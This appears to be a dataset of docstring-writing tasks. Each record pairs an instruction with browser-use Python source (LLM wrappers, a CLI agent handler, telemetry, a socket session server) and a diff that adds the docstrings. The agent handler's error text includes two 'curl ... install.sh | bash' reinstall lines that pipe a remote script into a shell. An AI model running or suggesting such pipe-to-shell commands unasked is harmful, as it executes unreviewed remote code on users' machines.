+ Create the most optimized schema by flattening all $ref/$defs while preserving
+ FULL descriptions and ALL action definitions. Also ensures OpenAI strict mode compatibility.
+
+ Args:
+ model: The Pydantic model to optimize
+ remove_min_items: If True, remove minItems from the schema
+ remove_defaults: If True, remove default values from the schema
+
+ Returns:
+ Optimized schema with all $refs resolved and strict mode compatibility
+ """
# Generate original schema
original_schema = model.model_json_schema()
@@ -21,6 +36,7 @@ # Create optimized schema with flattening
# Pass flags to optimize_schema via closure
def optimize_schema(obj: Any, defs_lookup: dict[str, Any] | None = None, *, in_properties: bool = False) -> Any:
+ """Apply all optimization techniques including flattening all $ref/$defs"""
if isinstance(obj, dict):
optimized: dict[str, Any] = {}
flattened_ref: dict[str, Any] | None = None
@@ -125,6 +141,7 @@
# Additional pass to ensure ALL objects have additionalProperties: false
def ensure_additional_properties_false(obj: Any) -> None:
+ """Ensure all objects have additionalProperties: false"""
if isinstance(obj, dict):
# If it's an object type, ensure additionalProperties is false
if obj.get('type') == 'object':
@@ -146,6 +163,7 @@ if remove_min_items or remove_defaults:
def remove_forbidden_fields(obj: Any) -> None:
+ """Recursively remove minItems/min_items and default values"""
if isinstance(obj, dict):
# Remove forbidden keys
if remove_min_items:
@@ -168,6 +186,7 @@
@staticmethod
def _make_strict_compatible(schema: dict[str, Any] | list[Any]) -> None:
+ """Ensure all properties are required for OpenAI strict mode"""
if isinstance(schema, dict):
# First recursively apply to nested objects
for key, value in schema.items():
@@ -186,4 +205,14 @@
@staticmethod
def create_gemini_optimized_schema(model: type[BaseModel]) -> dict[str, Any]:
- return SchemaOptimizer.create_optimized_json_schema(model)+ """
+ Create Gemini-optimized schema, preserving explicit `required` arrays so Gemini
+ respects mandatory fields defined by the caller.
+
+ Args:
+ model: The Pydantic model to optimize
+
+ Returns:
+ Optimized schema suitable for Gemini structured output
+ """
+ return SchemaOptimizer.create_optimized_json_schema(model)
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/schema.py |
Add well-formatted docstrings | from collections.abc import Mapping
from dataclasses import dataclass
from typing import Any, TypeVar, overload
import httpx
from openai import APIConnectionError, APIStatusError, AsyncOpenAI, RateLimitError
from openai.types.chat.chat_completion import ChatCompletion
from openai.types.shared_params.response_format_json_schema import (
JSONSchema,
ResponseFormatJSONSchema,
)
from pydantic import BaseModel
from browser_use.llm.base import BaseChatModel
from browser_use.llm.exceptions import ModelProviderError, ModelRateLimitError
from browser_use.llm.messages import BaseMessage
from browser_use.llm.openrouter.serializer import OpenRouterMessageSerializer
from browser_use.llm.schema import SchemaOptimizer
from browser_use.llm.views import ChatInvokeCompletion, ChatInvokeUsage
T = TypeVar('T', bound=BaseModel)
@dataclass
class ChatOpenRouter(BaseChatModel):
# Model configuration
model: str
# Model params
temperature: float | None = None
top_p: float | None = None
seed: int | None = None
# Client initialization parameters
api_key: str | None = None
http_referer: str | None = None # OpenRouter specific parameter for tracking
base_url: str | httpx.URL = 'https://openrouter.ai/api/v1'
timeout: float | httpx.Timeout | None = None
max_retries: int = 10
default_headers: Mapping[str, str] | None = None
default_query: Mapping[str, object] | None = None
http_client: httpx.AsyncClient | None = None
_strict_response_validation: bool = False
extra_body: dict[str, Any] | None = None
# Static
@property
def provider(self) -> str:
return 'openrouter'
def _get_client_params(self) -> dict[str, Any]:
# Define base client params
base_params = {
'api_key': self.api_key,
'base_url': self.base_url,
'timeout': self.timeout,
'max_retries': self.max_retries,
'default_headers': self.default_headers,
'default_query': self.default_query,
'_strict_response_validation': self._strict_response_validation,
'top_p': self.top_p,
'seed': self.seed,
}
# Create client_params dict with non-None values
client_params = {k: v for k, v in base_params.items() if v is not None}
# Add http_client if provided
if self.http_client is not None:
client_params['http_client'] = self.http_client
return client_params
def get_client(self) -> AsyncOpenAI:
if not hasattr(self, '_client'):
client_params = self._get_client_params()
self._client = AsyncOpenAI(**client_params)
return self._client
@property
def name(self) -> str:
return str(self.model)
def _get_usage(self, response: ChatCompletion) -> ChatInvokeUsage | None:
if response.usage is None:
return None
prompt_details = getattr(response.usage, 'prompt_tokens_details', None)
cached_tokens = prompt_details.cached_tokens if prompt_details else None
return ChatInvokeUsage(
prompt_tokens=response.usage.prompt_tokens,
prompt_cached_tokens=cached_tokens,
prompt_cache_creation_tokens=None,
prompt_image_tokens=None,
# Completion
completion_tokens=response.usage.completion_tokens,
total_tokens=response.usage.total_tokens,
)
@overload
async def ainvoke(
self, messages: list[BaseMessage], output_format: None = None, **kwargs: Any
) -> ChatInvokeCompletion[str]: ...
@overload
async def ainvoke(self, messages: list[BaseMessage], output_format: type[T], **kwargs: Any) -> ChatInvokeCompletion[T]: ...
async def ainvoke(
self, messages: list[BaseMessage], output_format: type[T] | None = None, **kwargs: Any
) -> ChatInvokeCompletion[T] | ChatInvokeCompletion[str]:
openrouter_messages = OpenRouterMessageSerializer.serialize_messages(messages)
# Set up extra headers for OpenRouter
extra_headers = {}
if self.http_referer:
extra_headers['HTTP-Referer'] = self.http_referer
try:
if output_format is None:
# Return string response
response = await self.get_client().chat.completions.create(
model=self.model,
messages=openrouter_messages,
temperature=self.temperature,
top_p=self.top_p,
seed=self.seed,
extra_headers=extra_headers,
**(self.extra_body or {}),
)
usage = self._get_usage(response)
return ChatInvokeCompletion(
completion=response.choices[0].message.content or '',
usage=usage,
)
else:
# Create a JSON schema for structured output
schema = SchemaOptimizer.create_optimized_json_schema(output_format)
response_format_schema: JSONSchema = {
'name': 'agent_output',
'strict': True,
'schema': schema,
}
# Return structured response
response = await self.get_client().chat.completions.create(
model=self.model,
messages=openrouter_messages,
temperature=self.temperature,
top_p=self.top_p,
seed=self.seed,
response_format=ResponseFormatJSONSchema(
json_schema=response_format_schema,
type='json_schema',
),
extra_headers=extra_headers,
**(self.extra_body or {}),
)
if response.choices[0].message.content is None:
raise ModelProviderError(
message='Failed to parse structured output from model response',
status_code=500,
model=self.name,
)
usage = self._get_usage(response)
parsed = output_format.model_validate_json(response.choices[0].message.content)
return ChatInvokeCompletion(
completion=parsed,
usage=usage,
)
except RateLimitError as e:
raise ModelRateLimitError(message=e.message, model=self.name) from e
except APIConnectionError as e:
raise ModelProviderError(message=str(e), model=self.name) from e
except APIStatusError as e:
raise ModelProviderError(message=e.message, status_code=e.status_code, model=self.name) from e
except Exception as e:
raise ModelProviderError(message=str(e), model=self.name) from e | --- +++ @@ -23,6 +23,12 @@
@dataclass
class ChatOpenRouter(BaseChatModel):
+ """
+ A wrapper around OpenRouter's chat API, which provides access to various LLM models
+ through a unified OpenAI-compatible interface.
+
+ This class implements the BaseChatModel protocol for OpenRouter's API.
+ """
# Model configuration
model: str
@@ -50,6 +56,7 @@ return 'openrouter'
def _get_client_params(self) -> dict[str, Any]:
+ """Prepare client parameters dictionary."""
# Define base client params
base_params = {
'api_key': self.api_key,
@@ -73,6 +80,12 @@ return client_params
def get_client(self) -> AsyncOpenAI:
+ """
+ Returns an AsyncOpenAI client configured for OpenRouter.
+
+ Returns:
+ AsyncOpenAI: An instance of the AsyncOpenAI client with OpenRouter base URL.
+ """
if not hasattr(self, '_client'):
client_params = self._get_client_params()
self._client = AsyncOpenAI(**client_params)
@@ -83,6 +96,7 @@ return str(self.model)
def _get_usage(self, response: ChatCompletion) -> ChatInvokeUsage | None:
+ """Extract usage information from the OpenRouter response."""
if response.usage is None:
return None
@@ -110,6 +124,16 @@ async def ainvoke(
self, messages: list[BaseMessage], output_format: type[T] | None = None, **kwargs: Any
) -> ChatInvokeCompletion[T] | ChatInvokeCompletion[str]:
+ """
+ Invoke the model with the given messages through OpenRouter.
+
+ Args:
+ messages: List of chat messages
+ output_format: Optional Pydantic model class for structured output
+
+ Returns:
+ Either a string response or an instance of output_format
+ """
openrouter_messages = OpenRouterMessageSerializer.serialize_messages(messages)
# Set up extra headers for OpenRouter
@@ -186,4 +210,4 @@ raise ModelProviderError(message=e.message, status_code=e.status_code, model=self.name) from e
except Exception as e:
- raise ModelProviderError(message=str(e), model=self.name) from e+ raise ModelProviderError(message=str(e), model=self.name) from e
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/openrouter/chat.py |
Write proper docstrings for these functions | from openai.types.chat import ChatCompletionMessageParam
from browser_use.llm.messages import BaseMessage
from browser_use.llm.openai.serializer import OpenAIMessageSerializer
class VercelMessageSerializer:
@staticmethod
def serialize_messages(messages: list[BaseMessage]) -> list[ChatCompletionMessageParam]:
# Vercel AI Gateway uses the same message format as OpenAI
return OpenAIMessageSerializer.serialize_messages(messages) | --- +++ @@ -5,8 +5,22 @@
class VercelMessageSerializer:
+ """
+ Serializer for converting between custom message types and Vercel AI Gateway message formats.
+
+ Vercel AI Gateway uses the OpenAI-compatible API, so we can reuse the OpenAI serializer.
+ """
@staticmethod
def serialize_messages(messages: list[BaseMessage]) -> list[ChatCompletionMessageParam]:
+ """
+ Serialize a list of browser_use messages to Vercel AI Gateway-compatible messages.
+
+ Args:
+ messages: List of browser_use messages
+
+ Returns:
+ List of Vercel AI Gateway-compatible messages (identical to OpenAI format)
+ """
# Vercel AI Gateway uses the same message format as OpenAI
- return OpenAIMessageSerializer.serialize_messages(messages)+ return OpenAIMessageSerializer.serialize_messages(messages)
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/vercel/serializer.py |
Add docstrings that explain logic |
import logging
import os
from typing import Any
from browser_use.skill_cli.api_key import APIKeyRequired, require_api_key
from browser_use.skill_cli.sessions import SessionInfo
logger = logging.getLogger(__name__)
# Cloud-only flags that only work in remote mode
CLOUD_ONLY_FLAGS = [
'session_id',
'proxy_country',
'wait',
'stream',
'flash',
'keep_alive',
'thinking',
'start_url',
'metadata',
'secret',
'allowed_domain',
'skill_id',
'structured_output',
'judge',
'judge_ground_truth',
]
async def handle(session: SessionInfo, params: dict[str, Any]) -> Any:
task = params.get('task')
if not task:
return {'success': False, 'error': 'No task provided'}
# Route based on browser mode
if session.browser_mode == 'remote':
# Remote mode requires Browser-Use API key
try:
require_api_key('Cloud agent tasks')
except APIKeyRequired as e:
return {'success': False, 'error': str(e)}
return await _handle_cloud_task(params)
else:
# Check if user tried to use cloud-only flags in local mode
used_cloud_flags = [f for f in CLOUD_ONLY_FLAGS if params.get(f)]
if used_cloud_flags:
from browser_use.skill_cli.install_config import is_mode_available
flags_str = ', '.join(f'--{f.replace("_", "-")}' for f in used_cloud_flags)
if is_mode_available('remote'):
# Remote is available, user just needs to use it
return {
'success': False,
'error': f'Cloud-only flags used in local mode: {flags_str}\nUse --browser remote to enable cloud features.',
}
else:
# Remote not installed (--local-only install)
return {
'success': False,
'error': f'Cloud-only flags require remote mode: {flags_str}\n'
f'Remote mode is not installed. Reinstall to enable:\n'
f' curl -fsSL https://browser-use.com/cli/install.sh | bash -s -- --remote-only\n'
f' curl -fsSL https://browser-use.com/cli/install.sh | bash -s -- --full',
}
return await _handle_local_task(session, params)
async def _handle_cloud_task(params: dict[str, Any]) -> Any:
from browser_use.skill_cli.commands import cloud_session, cloud_task
task = params['task']
# Handle vision flag (--vision vs --no-vision)
vision: bool | None = None
if params.get('vision'):
vision = True
elif params.get('no_vision'):
vision = False
# Parse key=value list params
metadata = _parse_key_value_list(params.get('metadata'))
secrets = _parse_key_value_list(params.get('secret'))
# Build session params - only include what user explicitly set
session_id = params.get('session_id')
profile_id = params.get('profile')
proxy_country = params.get('proxy_country')
try:
logger.info(f'Creating cloud task: {task}')
# Create session first if profile or proxy specified and no session_id
if (profile_id or proxy_country) and not session_id:
session = cloud_session.create_session(
profile_id=profile_id,
proxy_country=proxy_country,
keep_alive=params.get('keep_alive'),
)
session_id = session.id
logger.info(f'Created cloud session: {session_id}')
# Create cloud task - only pass what user explicitly set
task_response = cloud_task.create_task(
task=task,
llm=params.get('llm'),
session_id=session_id,
max_steps=params.get('max_steps'),
flash_mode=params.get('flash'),
thinking=params.get('thinking'),
vision=vision,
start_url=params.get('start_url'),
metadata=metadata,
secrets=secrets,
allowed_domains=params.get('allowed_domain'),
skill_ids=params.get('skill_id'),
structured_output=params.get('structured_output'),
judge=params.get('judge'),
judge_ground_truth=params.get('judge_ground_truth'),
)
task_id = task_response.id
response_session_id = task_response.session_id
if not task_id:
return {
'success': False,
'error': 'Cloud API did not return a task ID',
'task': task,
}
logger.info(f'Cloud task created: {task_id}')
# Return immediately unless --wait is specified
if not params.get('wait'):
return {
'success': True,
'task_id': task_id,
'session_id': response_session_id,
'message': 'Task started. Use "browser-use task status <task_id>" to check progress.',
}
# Poll until complete
logger.info('Waiting for task completion...')
result = await cloud_task.poll_until_complete(task_id, stream=params.get('stream', False))
return {
'success': True,
'task': task,
'task_id': task_id,
'session_id': response_session_id,
'status': result.status,
'output': result.output,
'cost': result.cost,
'done': result.status == 'finished',
}
except Exception as e:
logger.exception(f'Cloud task failed: {e}')
return {
'success': False,
'error': str(e),
'task': task,
}
def _parse_key_value_list(items: list[str] | None) -> dict[str, str | None] | None:
if not items:
return None
result: dict[str, str | None] = {}
for item in items:
if '=' in item:
key, value = item.split('=', 1)
result[key] = value
return result if result else None
async def _handle_local_task(session: SessionInfo, params: dict[str, Any]) -> Any:
task = params['task']
max_steps = params.get('max_steps')
model = params.get('llm') # Optional model override
try:
# Import agent and LLM
from browser_use.agent.service import Agent
# Try to get LLM from environment (with optional model override)
llm = get_llm(model=model)
if llm is None:
if model:
return {
'success': False,
'error': f'Could not initialize model "{model}". '
f'Make sure the appropriate API key is set (OPENAI_API_KEY, ANTHROPIC_API_KEY, or GOOGLE_API_KEY).',
}
return {
'success': False,
'error': 'No LLM configured. Set BROWSER_USE_API_KEY, OPENAI_API_KEY, ANTHROPIC_API_KEY, or GOOGLE_API_KEY',
}
# Create and run agent
agent = Agent(
task=task,
llm=llm,
browser_session=session.browser_session,
)
logger.info(f'Running local agent task: {task}')
run_kwargs = {}
if max_steps is not None:
run_kwargs['max_steps'] = max_steps
result = await agent.run(**run_kwargs)
# Extract result info
final_result = result.final_result() if result else None
return {
'success': True,
'task': task,
'steps': len(result) if result else 0,
'result': str(final_result) if final_result else None,
'done': result.is_done() if result else False,
}
except Exception as e:
logger.exception(f'Local agent task failed: {e}')
return {
'success': False,
'error': str(e),
'task': task,
}
def _get_verified_models() -> dict[str, set[str]]:
import typing
from anthropic.types.model_param import ModelParam
from openai.types.shared.chat_model import ChatModel
from browser_use.llm.google.chat import VerifiedGeminiModels
# OpenAI: ChatModel is a Literal type
openai_models = set(typing.get_args(ChatModel))
# Anthropic: ModelParam is Union[Literal[...], str] - extract the Literal
anthropic_literal = typing.get_args(ModelParam)[0]
anthropic_models = set(typing.get_args(anthropic_literal))
# Google: VerifiedGeminiModels Literal
google_models = set(typing.get_args(VerifiedGeminiModels))
# Browser-Use: cloud models
browser_use_models = {'bu-latest', 'bu-1-0', 'bu-2-0'}
return {
'openai': openai_models,
'anthropic': anthropic_models,
'google': google_models,
'browser-use': browser_use_models,
}
_VERIFIED_MODELS: dict[str, set[str]] | None = None
def _get_provider_for_model(model: str) -> str | None:
global _VERIFIED_MODELS
if _VERIFIED_MODELS is None:
_VERIFIED_MODELS = _get_verified_models()
for provider, models in _VERIFIED_MODELS.items():
if model in models:
return provider
return None
def get_llm(model: str | None = None) -> Any:
from browser_use.llm import ChatAnthropic, ChatBrowserUse, ChatGoogle, ChatOpenAI
if model:
provider = _get_provider_for_model(model)
if provider == 'openai':
return ChatOpenAI(model=model)
elif provider == 'anthropic':
return ChatAnthropic(model=model)
elif provider == 'google':
return ChatGoogle(model=model)
elif provider == 'browser-use':
return ChatBrowserUse(model=model)
else:
logger.warning(f'Unknown model: {model}. Not in any verified model list.')
return None
# No model specified - auto-detect from available API keys
if os.environ.get('BROWSER_USE_API_KEY'):
return ChatBrowserUse()
if os.environ.get('OPENAI_API_KEY'):
return ChatOpenAI(model='o3')
if os.environ.get('ANTHROPIC_API_KEY'):
return ChatAnthropic(model='claude-sonnet-4-0')
if os.environ.get('GOOGLE_API_KEY'):
return ChatGoogle(model='gemini-flash-latest')
return None | --- +++ @@ -1,3 +1,4 @@+"""Agent task command handler."""
import logging
import os
@@ -29,6 +30,12 @@
async def handle(session: SessionInfo, params: dict[str, Any]) -> Any:
+ """Handle agent run command.
+
+ Routes based on browser mode:
+ - Remote mode (--browser remote): Uses Cloud API with US proxy by default
+ - Local mode (default): Uses local browser-use agent
+ """
task = params.get('task')
if not task:
return {'success': False, 'error': 'No task provided'}
@@ -68,6 +75,10 @@
async def _handle_cloud_task(params: dict[str, Any]) -> Any:
+ """Handle task execution via Cloud API.
+
+ By default uses US proxy for all cloud tasks.
+ """
from browser_use.skill_cli.commands import cloud_session, cloud_task
task = params['task']
@@ -166,6 +177,7 @@
def _parse_key_value_list(items: list[str] | None) -> dict[str, str | None] | None:
+ """Parse a list of 'key=value' strings into a dict."""
if not items:
return None
result: dict[str, str | None] = {}
@@ -177,6 +189,7 @@
async def _handle_local_task(session: SessionInfo, params: dict[str, Any]) -> Any:
+ """Handle task execution locally with browser-use agent."""
task = params['task']
max_steps = params.get('max_steps')
model = params.get('llm') # Optional model override
@@ -233,6 +246,7 @@
def _get_verified_models() -> dict[str, set[str]]:
+ """Extract verified model names from SDK sources of truth."""
import typing
from anthropic.types.model_param import ModelParam
@@ -265,6 +279,7 @@
def _get_provider_for_model(model: str) -> str | None:
+ """Determine the provider by checking SDK verified model lists."""
global _VERIFIED_MODELS
if _VERIFIED_MODELS is None:
_VERIFIED_MODELS = _get_verified_models()
@@ -277,6 +292,16 @@
def get_llm(model: str | None = None) -> Any:
+ """Get LLM instance from environment configuration.
+
+ Args:
+ model: Optional model name to use. If provided, will instantiate
+ the appropriate provider for that model. If not provided,
+ auto-detects from available API keys.
+
+ Supported providers: OpenAI, Anthropic, Google, Browser-Use.
+ Model names are validated against each SDK's verified model list.
+ """
from browser_use.llm import ChatAnthropic, ChatBrowserUse, ChatGoogle, ChatOpenAI
if model:
@@ -307,4 +332,4 @@ if os.environ.get('GOOGLE_API_KEY'):
return ChatGoogle(model='gemini-flash-latest')
- return None+ return None
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/commands/agent.py |
Add docstrings with type hints explained | import logging
import os
from dotenv import load_dotenv
from posthog import Posthog
from uuid_extensions import uuid7str
from browser_use.telemetry.views import BaseTelemetryEvent
from browser_use.utils import singleton
load_dotenv()
from browser_use.config import CONFIG
logger = logging.getLogger(__name__)
POSTHOG_EVENT_SETTINGS = {
'process_person_profile': True,
}
@singleton
class ProductTelemetry:
USER_ID_PATH = str(CONFIG.BROWSER_USE_CONFIG_DIR / 'device_id')
PROJECT_API_KEY = 'phc_F8JMNjW1i2KbGUTaW1unnDdLSPCoyc52SGRU0JecaUh'
HOST = 'https://eu.i.posthog.com'
UNKNOWN_USER_ID = 'UNKNOWN'
_curr_user_id = None
def __init__(self) -> None:
telemetry_disabled = not CONFIG.ANONYMIZED_TELEMETRY
self.debug_logging = CONFIG.BROWSER_USE_LOGGING_LEVEL == 'debug'
if telemetry_disabled:
self._posthog_client = None
else:
logger.info('Using anonymized telemetry, see https://docs.browser-use.com/development/monitoring/telemetry.')
self._posthog_client = Posthog(
project_api_key=self.PROJECT_API_KEY,
host=self.HOST,
disable_geoip=False,
enable_exception_autocapture=True,
)
# Silence posthog's logging
if not self.debug_logging:
posthog_logger = logging.getLogger('posthog')
posthog_logger.disabled = True
if self._posthog_client is None:
logger.debug('Telemetry disabled')
def capture(self, event: BaseTelemetryEvent) -> None:
if self._posthog_client is None:
return
self._direct_capture(event)
def _direct_capture(self, event: BaseTelemetryEvent) -> None:
if self._posthog_client is None:
return
try:
self._posthog_client.capture(
distinct_id=self.user_id,
event=event.name,
properties={**event.properties, **POSTHOG_EVENT_SETTINGS},
)
except Exception as e:
logger.error(f'Failed to send telemetry event {event.name}: {e}')
def flush(self) -> None:
if self._posthog_client:
try:
self._posthog_client.flush()
logger.debug('PostHog client telemetry queue flushed.')
except Exception as e:
logger.error(f'Failed to flush PostHog client: {e}')
else:
logger.debug('PostHog client not available, skipping flush.')
@property
def user_id(self) -> str:
if self._curr_user_id:
return self._curr_user_id
# File access may fail due to permissions or other reasons. We don't want to
# crash so we catch all exceptions.
try:
if not os.path.exists(self.USER_ID_PATH):
os.makedirs(os.path.dirname(self.USER_ID_PATH), exist_ok=True)
with open(self.USER_ID_PATH, 'w') as f:
new_user_id = uuid7str()
f.write(new_user_id)
self._curr_user_id = new_user_id
else:
with open(self.USER_ID_PATH) as f:
self._curr_user_id = f.read()
except Exception:
self._curr_user_id = 'UNKNOWN_USER_ID'
return self._curr_user_id | --- +++ @@ -22,6 +22,11 @@
@singleton
class ProductTelemetry:
+ """
+ Service for capturing anonymized telemetry data.
+
+ If the environment variable `ANONYMIZED_TELEMETRY=False`, anonymized telemetry will be disabled.
+ """
USER_ID_PATH = str(CONFIG.BROWSER_USE_CONFIG_DIR / 'device_id')
PROJECT_API_KEY = 'phc_F8JMNjW1i2KbGUTaW1unnDdLSPCoyc52SGRU0JecaUh'
@@ -60,6 +65,9 @@ self._direct_capture(event)
def _direct_capture(self, event: BaseTelemetryEvent) -> None:
+ """
+ Should not be thread blocking because posthog magically handles it
+ """
if self._posthog_client is None:
return
@@ -101,4 +109,4 @@ self._curr_user_id = f.read()
except Exception:
self._curr_user_id = 'UNKNOWN_USER_ID'
- return self._curr_user_id+ return self._curr_user_id
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/telemetry/service.py |
Add docstrings for better understanding |
import argparse
import asyncio
import json
import logging
import os
import signal
import sys
from pathlib import Path
from typing import IO
import portalocker
# Configure logging before imports
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s [%(levelname)s] %(name)s: %(message)s',
handlers=[logging.StreamHandler()],
)
logger = logging.getLogger('browser_use.skill_cli.server')
class SessionServer:
def __init__(
self,
session_name: str,
browser_mode: str,
headed: bool,
profile: str | None,
) -> None:
self.session_name = session_name
self.browser_mode = browser_mode
self.headed = headed
self.profile = profile
self.running = True
self._server: asyncio.Server | None = None
self._shutdown_event: asyncio.Event | None = None
self._lock_file: IO | None = None
# Lazy import to avoid loading everything at startup
from browser_use.skill_cli.sessions import SessionRegistry
self.registry = SessionRegistry()
async def handle_connection(
self,
reader: asyncio.StreamReader,
writer: asyncio.StreamWriter,
) -> None:
addr = writer.get_extra_info('peername')
logger.debug(f'Connection from {addr}')
try:
while self.running:
try:
line = await asyncio.wait_for(reader.readline(), timeout=300) # 5 min timeout
except TimeoutError:
logger.debug(f'Connection timeout from {addr}')
break
if not line:
break
request = {}
try:
request = json.loads(line.decode())
response = await self.dispatch(request)
except json.JSONDecodeError as e:
response = {'id': '', 'success': False, 'error': f'Invalid JSON: {e}'}
except Exception as e:
logger.exception(f'Error handling request: {e}')
response = {'id': '', 'success': False, 'error': str(e)}
writer.write((json.dumps(response) + '\n').encode())
await writer.drain()
# Check for shutdown command
if request.get('action') == 'shutdown':
await self.shutdown()
break
except Exception as e:
logger.exception(f'Connection error: {e}')
finally:
writer.close()
try:
await writer.wait_closed()
except Exception:
pass
async def dispatch(self, request: dict) -> dict:
action = request.get('action', '')
params = request.get('params', {})
req_id = request.get('id', '')
logger.info(f'Dispatch: {action} (id={req_id})')
try:
# Import command handlers
from browser_use.skill_cli.commands import agent, browser, python_exec, session
# Handle shutdown
if action == 'shutdown':
return {'id': req_id, 'success': True, 'data': {'shutdown': True}}
# Session commands don't need a browser session
if action in session.COMMANDS:
result = await session.handle(action, self.session_name, self.registry, params)
# Check if command wants to shutdown server
if result.get('_shutdown'):
asyncio.create_task(self.shutdown())
return {'id': req_id, 'success': True, 'data': result}
# Get or create session for browser commands
session_info = await self.registry.get_or_create(
self.session_name,
self.browser_mode,
self.headed,
self.profile,
)
# Dispatch to handler
if action in browser.COMMANDS:
result = await browser.handle(action, session_info, params)
elif action == 'python':
result = await python_exec.handle(session_info, params)
elif action == 'run':
result = await agent.handle(session_info, params)
else:
return {'id': req_id, 'success': False, 'error': f'Unknown action: {action}'}
return {'id': req_id, 'success': True, 'data': result}
except Exception as e:
logger.exception(f'Error dispatching {action}: {e}')
return {'id': req_id, 'success': False, 'error': str(e)}
async def shutdown(self) -> None:
logger.info('Shutting down server...')
self.running = False
# Signal the shutdown event
if self._shutdown_event:
self._shutdown_event.set()
# Close all sessions
await self.registry.close_all()
# Stop the server
if self._server:
self._server.close()
await self._server.wait_closed()
# Clean up files
from browser_use.skill_cli.utils import cleanup_session_files
cleanup_session_files(self.session_name)
async def run(self) -> None:
from browser_use.skill_cli.utils import get_lock_path, get_pid_path, get_socket_path
# Acquire exclusive lock BEFORE writing PID - this prevents race conditions
lock_path = get_lock_path(self.session_name)
lock_path.parent.mkdir(parents=True, exist_ok=True)
lock_path.touch(exist_ok=True)
self._lock_file = open(lock_path, 'r+') # noqa: ASYNC230 - blocking ok at startup
try:
portalocker.lock(self._lock_file, portalocker.LOCK_EX | portalocker.LOCK_NB)
except portalocker.LockException:
logger.error(f'Another server is already running for session: {self.session_name}')
self._lock_file.close()
self._lock_file = None
sys.exit(1)
logger.info(f'Acquired exclusive lock for session: {self.session_name}')
# NOW safe to write PID file
pid_path = get_pid_path(self.session_name)
pid_path.write_text(str(os.getpid()))
logger.info(f'PID file: {pid_path}')
# Setup signal handlers
loop = asyncio.get_running_loop()
def signal_handler():
asyncio.create_task(self.shutdown())
for sig in (signal.SIGINT, signal.SIGTERM):
try:
loop.add_signal_handler(sig, signal_handler)
except NotImplementedError:
# Windows doesn't support add_signal_handler
pass
# Also handle SIGHUP on Unix
if hasattr(signal, 'SIGHUP'):
try:
loop.add_signal_handler(signal.SIGHUP, signal_handler)
except NotImplementedError:
pass
# Get socket path
sock_path = get_socket_path(self.session_name)
logger.info(f'Socket: {sock_path}')
# Start server
if sock_path.startswith('tcp://'):
# Windows: TCP server
_, hostport = sock_path.split('://', 1)
host, port = hostport.split(':')
self._server = await asyncio.start_server(
self.handle_connection,
host,
int(port),
reuse_address=True, # Allow rebinding ports in TIME_WAIT state
)
logger.info(f'Listening on TCP {host}:{port}')
else:
# Unix: socket server
# Remove stale socket file
sock_file = Path(sock_path)
if sock_file.exists():
sock_file.unlink()
self._server = await asyncio.start_unix_server(
self.handle_connection,
sock_path,
)
logger.info(f'Listening on Unix socket {sock_path}')
# Run until shutdown
self._shutdown_event = asyncio.Event()
try:
async with self._server:
await self._shutdown_event.wait()
except asyncio.CancelledError:
pass
finally:
# Release lock on shutdown
if self._lock_file:
try:
portalocker.unlock(self._lock_file)
self._lock_file.close()
except Exception:
pass
self._lock_file = None
logger.info('Server stopped')
def main() -> None:
parser = argparse.ArgumentParser(description='Browser-use session server')
parser.add_argument('--session', required=True, help='Session name')
parser.add_argument('--browser', default='chromium', choices=['chromium', 'real', 'remote'])
parser.add_argument('--headed', action='store_true', help='Show browser window')
parser.add_argument('--profile', help='Chrome profile (real browser mode)')
args = parser.parse_args()
logger.info(f'Starting server for session: {args.session}')
logger.info(f'Browser mode: {args.browser}, headed: {args.headed}')
server = SessionServer(
session_name=args.session,
browser_mode=args.browser,
headed=args.headed,
profile=args.profile,
)
try:
asyncio.run(server.run())
except KeyboardInterrupt:
logger.info('Interrupted')
except Exception as e:
logger.exception(f'Server error: {e}')
sys.exit(1)
if __name__ == '__main__':
main() | --- +++ @@ -1,3 +1,9 @@+"""Session server - keeps BrowserSession instances alive.
+
+This server runs as a background process, managing browser sessions and
+handling commands from the CLI. It uses Unix sockets (or TCP on Windows)
+for IPC communication.
+"""
import argparse
import asyncio
@@ -21,6 +27,7 @@
class SessionServer:
+ """Server that manages browser sessions and handles CLI commands."""
def __init__(
self,
@@ -48,6 +55,7 @@ reader: asyncio.StreamReader,
writer: asyncio.StreamWriter,
) -> None:
+ """Handle a client connection."""
addr = writer.get_extra_info('peername')
logger.debug(f'Connection from {addr}')
@@ -90,6 +98,7 @@ pass
async def dispatch(self, request: dict) -> dict:
+ """Dispatch command to appropriate handler."""
action = request.get('action', '')
params = request.get('params', {})
req_id = request.get('id', '')
@@ -137,6 +146,7 @@ return {'id': req_id, 'success': False, 'error': str(e)}
async def shutdown(self) -> None:
+ """Graceful shutdown."""
logger.info('Shutting down server...')
self.running = False
@@ -158,6 +168,7 @@ cleanup_session_files(self.session_name)
async def run(self) -> None:
+ """Run the server."""
from browser_use.skill_cli.utils import get_lock_path, get_pid_path, get_socket_path
# Acquire exclusive lock BEFORE writing PID - this prevents race conditions
@@ -250,6 +261,7 @@
def main() -> None:
+ """Main entry point for server process."""
parser = argparse.ArgumentParser(description='Browser-use session server')
parser.add_argument('--session', required=True, help='Session name')
parser.add_argument('--browser', default='chromium', choices=['chromium', 'real', 'remote'])
@@ -277,4 +289,4 @@
if __name__ == '__main__':
- main()+ main()
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/server.py |
Create docstrings for reusable components |
import hashlib
import os
import platform
import signal
import subprocess
import sys
import tempfile
from pathlib import Path
from typing import IO
import portalocker
def get_socket_path(session: str) -> str:
if sys.platform == 'win32':
# Windows: use TCP on deterministic port (49152-65535)
# Use 127.0.0.1 explicitly (not localhost) to avoid IPv6 binding issues
port = 49152 + (int(hashlib.md5(session.encode()).hexdigest()[:4], 16) % 16383)
return f'tcp://127.0.0.1:{port}'
return str(Path(tempfile.gettempdir()) / f'browser-use-{session}.sock')
def get_pid_path(session: str) -> Path:
return Path(tempfile.gettempdir()) / f'browser-use-{session}.pid'
def get_log_path(session: str) -> Path:
return Path(tempfile.gettempdir()) / f'browser-use-{session}.log'
def get_lock_path(session: str) -> Path:
return Path(tempfile.gettempdir()) / f'browser-use-{session}.lock'
def _pid_exists(pid: int) -> bool:
if sys.platform == 'win32':
import ctypes
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
